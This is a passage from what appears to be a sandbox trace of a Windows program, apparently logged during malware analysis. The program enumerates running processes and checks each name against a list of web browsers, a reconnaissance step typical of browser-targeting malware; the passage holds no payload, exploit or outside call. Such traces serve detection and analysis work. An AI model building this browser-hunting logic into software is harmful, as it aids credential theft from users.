[0200.925] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0200.925] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0200.925] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0200.925] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0200.925] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0200.925] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0200.925] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0200.925] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.925] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0200.926] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0200.926] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0200.926] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0200.926] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0200.926] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.926] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0200.926] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0200.926] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0200.927] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0200.927] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0200.927] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.927] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0200.927] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0200.927] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0200.927] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0200.927] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0200.927] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.927] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0200.928] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0200.928] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0200.928] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0200.928] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0200.928] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.928] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0200.928] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0200.928] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0200.928] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0200.928] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0200.928] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.928] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0200.929] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0200.929] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0200.929] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0200.929] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0200.929] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.929] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0200.929] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0200.930] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0200.930] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0200.930] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0200.930] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.930] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.930] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0200.930] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0200.930] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0200.930] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0200.930] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.930] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.931] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0200.931] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0200.931] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0200.931] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0200.931] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.931] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.931] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0200.931] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0200.931] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0200.931] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0200.931] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.931] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.932] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0200.932] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0200.932] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0200.932] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0200.932] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.932] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.932] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0200.932] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0200.932] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0200.932] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0200.933] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.933] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0200.933] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0200.933] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0200.933] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0200.933] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0200.933] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.933] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.934] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0200.934] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0200.934] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0200.934] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0200.934] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.934] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.934] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0200.934] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0200.934] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0200.934] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0200.934] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.934] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0200.935] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0200.935] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0200.935] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0200.935] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0200.935] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.935] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0200.935] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0200.935] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0200.935] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0200.935] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0200.935] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.935] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0200.936] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0200.936] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0200.936] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0200.936] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0200.936] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.936] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.937] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0200.937] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0200.937] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0200.937] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0200.937] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.937] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0200.937] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0200.937] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0200.937] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0200.937] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0200.937] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.937] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0200.938] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0200.938] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0200.938] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0200.938] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0200.938] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.938] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0200.938] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0200.938] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0200.938] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0200.938] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0200.938] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.938] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0200.939] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0200.939] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0200.939] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0200.939] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0200.939] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.939] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0200.940] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0200.940] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0200.940] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0200.940] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0200.940] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.940] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0200.940] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0200.940] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0200.940] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0200.940] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0200.940] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.940] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0200.941] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0200.941] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0200.941] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0200.941] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0200.941] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.941] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0200.941] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0200.941] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0200.941] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0200.941] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0200.941] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.941] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0200.942] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0200.942] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0200.942] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0200.942] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0200.942] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.942] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0200.942] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0200.942] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0200.942] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0200.943] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0200.943] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.943] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0200.943] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0200.943] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0200.943] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0200.943] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0200.943] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.943] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0200.944] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0200.944] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0200.944] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0200.944] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0200.944] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.944] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0200.944] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0200.944] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0200.944] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0200.944] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0200.944] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.944] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0200.945] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0200.945] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0200.945] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0200.945] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0200.945] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.945] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0200.945] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0200.945] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0200.945] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0200.945] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0200.945] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.945] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0200.946] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0200.946] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0200.946] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0200.946] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0200.946] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.946] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0200.947] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0200.947] lstrcmpiA 